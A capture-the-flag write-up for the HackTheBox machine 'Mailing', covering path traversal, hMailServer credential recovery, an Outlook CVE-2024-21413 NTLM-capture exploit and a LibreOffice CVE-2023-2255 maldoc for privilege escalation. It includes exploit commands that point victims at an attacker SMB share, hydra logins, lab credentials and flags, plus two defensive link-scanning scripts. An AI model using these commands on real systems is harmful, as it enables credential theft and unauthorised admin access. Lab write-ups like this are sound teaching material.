HackTheBox | Mailing

In this walkthrough, I demonstrate how I obtained complete ownership of Mailing on HackTheBox
In: HackTheBox, Attack, CTF, Windows, Easy Challenge

Nmap Results

# Nmap 7.94SVN scan initiated Tue May  7 00:00:38 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.180.156
Nmap scan report for 10.129.180.156
Host is up (0.017s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp   open  pop3          hMailServer pop3d
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
445/tcp   open  microsoft-ds?
465/tcp   open  ssl/smtp      hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
587/tcp   open  smtp          hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
993/tcp   open  ssl/imap      hMailServer imapd
|_imap-capabilities: IMAP4rev1 SORT completed IMAP4 OK NAMESPACE RIGHTS=texkA0001 ACL CHILDREN CAPABILITY IDLE QUOTA
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
65522/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-05-07T04:04:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May  7 00:05:05 2024 -- 1 IP address (1 host up) scanned in 267.31 seconds

We can see references to mailing.htb in the multiple protocol headers in the nmap scan, so let's go ahead and get that added to our /etc/hosts file.

echo '10.129.180.156        mailing.htb' | sudo tee -a /etc/hosts





Service Enumeration

TCP/139,445

smbclient -N -L //10.129.180.156
No anonymous SMB share access



TCP/80

Server technology disclosure, but we already saw this in the nmap output
Just at first glance, the Download Instructions buttons could be interesting
I downloaded the instructions.pdf file
There is still metadata on the file that shows that Ruy from IT is the author



Testing for Path Traversal and File Inclusion

In Burp, select the download request and send to Repeater
Then, manually test file paths in the ?file= parameter
🚫
Remote File Inclusion (RFI) did not appear to work



Find the Configuration File for the Mail Server

The admin hash cracks easily
Not so for the user hash, but let's carry on



Downloading the hMailServer Database

curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Database/hMailServer.sdf' -o hMailServer.sdf
The database is encrypted with the password in the .ini file
GitHub - GitMirar/hMailDatabasePasswordDecrypter: Decrypts blowfish (w. static key) encrypted hMail database password.

We can use this tool to decrypt the Blowfish-encrypted database password from the .ini file

git clone https://github.com/GitMirar/hMailDatabasePasswordDecrypter
cd hMailDatabasePasswordDecrypter
make
This is the cleartext database password



Reading the Database File

💡
You could greatly simplify this process by transferring the .sdf file to a Windows box and installing a tool on Windows to open the .sdf file. I am going to be using wine on my Kali box to open the file. It was a pain trying to find a binary that will work with wine due to various .NET requirements.
Installing Wine and Wi... | 0xBEN | Notes

Install wine on your Kali box

For the purpose of reading the .sdf file, I'll be using this application: https://www.flyhoward.com/SDF_Viewer.aspx. It is a Windows binary, which is why we're using wine.

ℹ️
Just use the trial period to open the file and be done with it
wine ./SetupSDFviewer.msi

Run the installer

Next
Uncheck the box > Next > Complete the installation using the defaults
Launch the application
File > Open
Z:
Navigate to where you've stored your .sdf file
Enter the database password we cracked
hMailServer [sha256($s.$p) 256/256 AVX2 8x] -- does not crack with rockyou.txt



Interesting Info from the Database

hm_messages table has some interesting info
hm_servermessages table shows anti-virus might be enabled
hm_settings table has a SMTP relay hashed password (MD5)
GitHub - mvdnes/hm_decrypt: hMailServer Password Decrypter

I found this decryptor tool using a quick Google search

git clone https://github.com/mvdnes/hm_decrypt
cd hm_decrypt
# Found that xbuild will compile a CSharp .sln
# Via search with Bing Co-Pilot
xbuild
# xbuild output will show that the binaries are in bin/Debug
cd bin/Debug
Nice! Let's keep that in our pocket for now.



Reading the Server Logs

Logging - hMailServer - Free open source email server for Microsoft Windows

Using a combination of data found on Google and ChatGPT / Bing Co-Pilot, my understanding is that logs should be in C:\Program Files (x86)\hMailServer\Logs\hMailServer_{format}.log, where we substitute {format} for whichever logging type is being recorded.

I tried variations of smtp, pop3, and imap, but couldn't find anything. I did — however — find that awstats.log is enabled.

# Pull the awstats log through the same traversal, keep fields 3 and 4 (addresses),
# split them one per line and de-duplicate
curl -s 'http://mailing.htb/download.php?file=../../../../../Program+Files+(x86)/hMailServer/Logs/hMailServer_awstats.log' | awk -v FS=' ' '{print $3,$4}' | tr ' ' '\n' | sort -u



TCP/143

Testing IMAP Logins

hydra -I -f -V -L emails.txt -p 'homenetworkingadministrator' -c 1 imap://mailing.htb
hydra -I -f -V -L emails.txt -p 'Bm8zF3c5s7R9L1o2' -c 1 imap://mailing.htb



Mapping Mailboxes with Mutt

IMAP | 0xBEN | Notes

Administrator

nano admin-muttrc
set my_mailproto="imap"
set my_mailuser="administrator@mailing.htb"
set my_mailpass="homenetworkingadministrator"
set my_maildomain="mailing.htb"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set header_cache = /tmp/.username-hcache
set record = "Sent"
set postponed = "Drafts"
set mail_check = 60
set timeout = 10
set header_cache = "/tmp/.$my_mailuser-hcache"
set net_inc=5
mutt -F ./admin-muttrc
Logged in as administrator@mailing.htb
ℹ️
Currently, we're looking at the Inbox folder. To change to another folder, press the c key and then the ? to select a folder. Press q to quit out of mutt.
There was nothing in any of these folders



Maya

nano maya-muttrc
set my_mailproto="imap"
set my_mailuser="maya@mailing.htb"
set my_mailpass="Bm8zF3c5s7R9L1o2"
set my_maildomain="mailing.htb"
set ssl_starttls = no
set ssl_force_tls = no
set spoolfile = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set folder = "$my_mailproto://$my_mailuser:$my_mailpass@$my_maildomain/"
set header_cache = /tmp/.username-hcache
set record = "Sent"
set postponed = "Drafts"
set mail_check = 60
set timeout = 10
set header_cache = "/tmp/.$my_mailuser-hcache"
set net_inc=5
mutt -F maya-muttrc
Empty inbox
Lots of stuff in the Deleted Items folder
Use the arrow keys to navigate, press the Enter key to open an email
Press v to view attachments
Open the text/html attachment
CVE-2024-21413 PoC. ... interesting





Exploit

CVE-2024-21413

This really cuts to the point of this box being named Mailing, in that we're looking at sending a crafted email to a user. This crafted email — when viewed using the email client's HTML view — leads to a zero-click NTLM credential theft, as the file:/// link is parsed without any security restraints. When the file:/// link is followed, this will lead to an SMB connection to the attacker's system, using NTLM as the authentication mechanism.
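As an added example (not code from this walkthrough or from the PoC the post links), here is the check a mail gateway or an incident responder can run over an HTML body to flag the link shape this vulnerability relies on: any href/src using the file: scheme or a bare \\host\share UNC path, both of which make the client authenticate over SMB to whatever host the link names. The sample messages and the 192.0.2.10 host are constructed for the example.

```python
"""Flag HTML e-mail bodies whose links point at the file: scheme or a UNC share.

Added example (not code from the original walkthrough or from the PoC it links):
a gateway-style check for the link shape behind CVE-2024-21413, where following a
file:/// or \\host\share link from the HTML view makes the client open an SMB
connection and authenticate with NTLM to whatever host the link names. Legitimate
inbound mail has no reason to link to file: or to an SMB share, so every hit is
worth quarantining or at least alerting on. The messages below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Attributes whose value a mail client will fetch or follow.
LINK_ATTRS = {"href", "src", "action", "background"}
# \\host\share\... ; group 1 is the host (IP or name) the client would connect to.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


class _LinkCollector(HTMLParser):
    """Collect (tag, attribute, value) for every link-like attribute in the body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in LINK_ATTRS and value:
                self.links.append((tag, name.lower(), value))


def classify_link(value):
    """Return (kind, host) if the link would leave via file:/SMB, else None.

    kind is 'file' for file:// URLs (host is the URL authority, or None for a
    drive-letter path) and 'unc' for bare \\host\share paths.
    """
    raw = unquote(value.strip())          # %5C%5C hides backslashes from naive greps
    parts = urlsplit(raw)
    if parts.scheme.lower() == "file":
        # file://host/share/x names a remote host; file:///C:/x does not, but a
        # file: link in inbound mail is unexpected either way.
        return ("file", parts.netloc or None)
    m = UNC_RE.match(raw)
    if m:
        return ("unc", m.group(1))
    return None


def scan_html(body):
    """Return a list of findings: dicts with tag, attr, kind, host, value."""
    collector = _LinkCollector()
    collector.feed(body)
    findings = []
    for tag, attr, value in collector.links:
        verdict = classify_link(value)
        if verdict:
            kind, host = verdict
            findings.append({"tag": tag, "attr": attr, "kind": kind,
                             "host": host, "value": value})
    return findings


# Constructed samples: one benign message, two bodies with outbound SMB links.
BENIGN = '<p>See <a href="https://mailing.htb/instructions.pdf">the instructions</a>.</p>'
FILE_LINK = '<a href="file://192.0.2.10/share/readme.txt">Open me</a>'
UNC_IMG = '<img src="%5C%5C192.0.2.10%5Cshare%5Cpixel.png" width="1" height="1">'

if __name__ == "__main__":
    for name, body in [("benign", BENIGN), ("file", FILE_LINK), ("unc", UNC_IMG)]:
        print(name, scan_html(body))
```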

💡
I'm sure it was the author's intention to demonstrate sending maya@mailing.htb an email in the instructions.pdf file as a foreshadowing of the initial foothold.
GitHub - xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability: Microsoft-Outlook-Remote-Code-Execution-Vulnerability
sudo impacket-smbserver -smb2support evil .

Start the SMB server to catch the NTLM authentication

git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
cd CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username 'maya@mailing.htb' --password 'Bm8zF3c5s7R9L1o2' --sender 'maya@mailing.htb' --recipient 'maya@mailing.htb' --url '\\10.10.14.112\evil\evil.txt' --subject 'Hello, Maya'

Run the exploit

Save the hash to a file
Crack the hash



Test WinRM Access

evil-winrm -i mailing.htb -u Maya -p 'm4y4ngs4ri'

Test credentials against WinRM

We're in!





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Access denied to systeminfo    

Current User

User Name    SID
============ =============================================
mailing\maya S-1-5-21-3356585197-584674788-3201212231-1002


GROUP INFORMATION
-----------------

Group Name                                   Type             SID          Attributes
============================================ ================ ============ ==================================================
Todos                                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users              Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios                             Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto        Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                         Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados         Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía                   Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                  State
============================= ============================================ =======
SeChangeNotifyPrivilege       Omitir comprobación de recorrido             Enabled
SeUndockPrivilege             Quitar equipo de la estación de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege           Cambiar la zona horaria                      Enabled    



Users and Groups

Local Users

Name               Enabled Description
----               ------- -----------
Administrador      False   Cuenta integrada para la administración del equipo o dominio
DefaultAccount     False   Cuenta de usuario administrada por el sistema.
Invitado           False   Cuenta integrada para el acceso como invitado al equipo o dominio
localadmin         True
maya               True
WDAGUtilityAccount False   Una cuenta de usuario que el sistema administra y usa para escenarios de Protección de aplicaciones de Windows Defender.    

Local Groups

Name
----
Administradores
Administradores de Hyper-V
Duplicadores
IIS_IUSRS
Invitados
Lectores del registro de eventos
Operadores criptográficos
Operadores de asistencia de control de acceso
Operadores de configuración de red
Operadores de copia de seguridad
Propietarios del dispositivo
Remote Management Users
System Managed Accounts Group
Usuarios
Usuarios avanzados
Usuarios COM distribuidos
Usuarios de escritorio remoto
Usuarios del monitor de sistema
Usuarios del registro de rendimiento    



Network Configurations

Network Interfaces

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::f897:ed7d:f35e:32a8
   Temporary IPv6 Address. . . . . . : dead:beef::d8e9:b8a4:3d01:3f62
   Link-local IPv6 Address . . . . . : fe80::c1bf:9c37:4c49:944f%14
   IPv4 Address. . . . . . . . . . . : 10.129.25.72
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:2bb5%14
                                       10.129.0.1



Scheduled Tasks

Interesting Scheduled Tasks

Run As User:                          maya
TaskName:                             \Test
Task To Run:                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Users\localadmin\Documents\scripts\soffice.ps1 
    
Run As User:                          localadmin
TaskName:                             \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319
Task To Run:                          COM handler



Interesting Files

C:\Users\maya\AppData\Roaming\LibreOffice\4\user\registrymodifications.xcu

<item oor:path="/org.openoffice.Office.Histories/Histories/org.openoffice.Office.Histories:HistoryInfo['PickList']/ItemList">
  <node oor:name="file:///C:/Users/Public/Documents/exploit.odt" oor:op="replace">
    <prop oor:name="Title" oor:op="fuse"><value>exploit</value></prop>
    <prop oor:name="Filter" oor:op="fuse"><value>writer8</value></prop>
    <prop oor:name="Password" oor:op="fuse"><value></value></prop>
    <prop oor:name="ReadOnly" oor:op="fuse"><value>false</value></prop>
    <prop oor:name="Thumbnail" oor:op="fuse"><value>[base64 PNG thumbnail omitted]</value></prop>
  </node>
</item>
<item oor:path="/org.openoffice.Office.Histories/Histories/org.openoffice.Office.Histories:HistoryInfo['PickList']/ItemList">
  <node oor:name="file:///C:/Users/maya/Documents/exploit.odt" oor:op="replace">
    <prop oor:name="Title" oor:op="fuse"><value>exploit</value></prop>
    <prop oor:name="Filter" oor:op="fuse"><value>writer8</value></prop>
    <prop oor:name="Password" oor:op="fuse"><value></value></prop>
    <prop oor:name="ReadOnly" oor:op="fuse"><value>false</value></prop>
    <prop oor:name="Thumbnail" oor:op="fuse"><value>[base64 PNG thumbnail omitted]</value></prop>
  </node>
</item>





Privilege Escalation

Lateral to localadmin

During the post-exploitation enumeration, a few things stick out to me at first glance:

  • C:\Important Documents
  • The scheduled task running soffice.ps1 out of C:\Users\localadmin

I was also hunting around in different directories searching for keywords such as password, passw, pass, etc. This is how I landed on the document at C:\Users\maya\AppData\Roaming\LibreOffice\4\user\registrymodifications.xcu which is pointing me towards the possibility of privilege escalation via malicious document.



Exploring the Maldoc Avenue

Obviously, we can't read the files in C:\Users\localadmin, so we can't be sure what the soffice.ps1 script is doing, but let's see if we can find any other information that might help.

# Recursively list the entire C:\ volume for files
# Filter on file names containing *soffice*
# Show only full paths
(Get-ChildItem 'C:\' -File -Recurse -Filter '*soffice*' -ErrorAction SilentlyContinue).FullName

C:\Program Files\LibreOffice\program\soffice.ps1

# Set the directory where the .odt files are located
$directory = "C:\Users\Public\Documents"

# Get all files with .odt extension in the specified directory
$files = Get-ChildItem -Path $directory -Filter *.odt

# Loop through each .odt file and open it
foreach ($file in $files) {
    Start-Process $file.FullName
}

Looking at the source code for C:\Program Files\LibreOffice\program\soffice.ps1, we can see that it will attempt to open any *.odt file in a specified directory; in this case, C:\Users\Public\Documents.

I suspect the C:\Users\localadmin\Documents\soffice.ps1 script is a modified version of the one discovered here. It probably reads from a different directory — I'm thinking the C:\Important Documents directory.

This information, coupled with what I found earlier showing references to file:///C:/Users/maya/Documents/exploit.odt, makes me think that my hypothesis to pivot using a maldoc is correct.



Crafting the Maldoc

This was one of the lateral pivots in the HTB Office box as well, so I'll just be using my existing knowledge of the exploit from working on that box. The POC and CVE data are linked just below for more information. But in short, the exploit works due to the fact that in certain versions, LibreOffice will load links in crafted documents without user interaction (zero-click).
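The auto-opener found above (soffice.ps1) hands every .odt in a shared directory to LibreOffice, and the zero-click behaviour just described means a link inside that document is followed without a prompt. As an added example, not code from this post or from the linked PoC, this Python pre-flight check unzips an .odt and reports every xlink:href in content.xml that points outside the document (any URL scheme, a drive-letter path, or a UNC path), which is exactly what such a scheduled opener should refuse to open. The element names follow the ODF namespaces; the sample documents and the 192.0.2.10 host are constructed.

```python
"""Scan an .odt for links that would make LibreOffice reach out to another host.

Added example (not from the walkthrough or from the linked PoC): an ODF document
is a zip whose content.xml holds the body; any element carrying an xlink:href
can name an external target, and CVE-2023-2255 is LibreOffice following such
links in a crafted document without asking. This pre-flight check is what an
automated opener like soffice.ps1 should run before Start-Process on files in a
directory other users can write to. The sample documents below are constructed.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
# Targets that leave the document: anything with a scheme (http:, file:, smb:,
# or a drive letter such as C:), plus UNC paths (\\host\share) and their
# forward-slash spelling (//host/share). Relative paths like Pictures/x.png pass.
EXTERNAL_RE = re.compile(r"^(?:[a-zA-Z][a-zA-Z0-9+.-]*:|\\\\|//)")


def external_links(odt_bytes):
    """Return [(element_tag, href)] for every external xlink:href in content.xml."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        root = ET.fromstring(zf.read("content.xml"))
    for el in root.iter():
        href = el.get(XLINK_HREF)
        if href and EXTERNAL_RE.match(href.strip()):
            tag = el.tag.split("}")[-1]          # drop the namespace URI
            findings.append((tag, href))
    return findings


def is_safe_to_auto_open(odt_bytes):
    """True only when the document carries no link to a location outside itself."""
    return not external_links(odt_bytes)


CONTENT_TMPL = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<office:document-content'
    ' xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"'
    ' xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"'
    ' xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0"'
    ' xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<office:body><office:text>{body}</office:text></office:body>'
    '</office:document-content>'
)


def make_odt(body_xml):
    """Build a minimal .odt in memory (constructed test data, not a real export)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text",
                    compress_type=zipfile.ZIP_STORED)
        zf.writestr("content.xml", CONTENT_TMPL.format(body=body_xml))
    return buf.getvalue()


# Constructed samples: an internal-only document and one linking to an SMB share.
CLEAN_ODT = make_odt(
    '<text:p>Quarterly notes</text:p>'
    '<draw:frame><draw:image xlink:href="Pictures/logo.png"/></draw:frame>'
)
SHARE_ODT = make_odt(
    '<text:p>Please review</text:p>'
    '<draw:frame><draw:image xlink:href="//192.0.2.10/share/banner.png"/></draw:frame>'
)

if __name__ == "__main__":
    print(external_links(CLEAN_ODT))   # []
    print(external_links(SHARE_ODT))   # [('image', '//192.0.2.10/share/banner.png')]
```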

GitHub - elweth-sec/CVE-2023-2255: CVE-2023-2255 Libre Office
# Clone the repo
git clone https://github.com/elweth-sec/CVE-2023-2255
# Enter the directory
cd CVE-2023-2255
# Create the malicious .odt document
python3 CVE-2023-2255.py --cmd '//10.10.14.112/evil/evil.exe' --output pwn.odt
# Start a SMB server to catch the hash
sudo impacket-smbserver -smb2support evil .
We can use the evil-winrm built-in upload functionality
🎉 Nice! 🎉
⚠️
The hash does not appear to be crackable using rockyou.txt and we probably won't be able to relay the NetNTLMv2 hash back onto the target itself. So, let's create one more maldoc and finish the job.
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output pwn.odt

Note that the computer's localization is in Spanish!

Once the .odt file is deleted, you know the exploit has been run
Log out and log back in, note we're now in the Administrators group!



Flags

User

9784c83d0dbf02a9f237197737876625    

Root

3d664924b00f0be0e92f04db10ff3e76    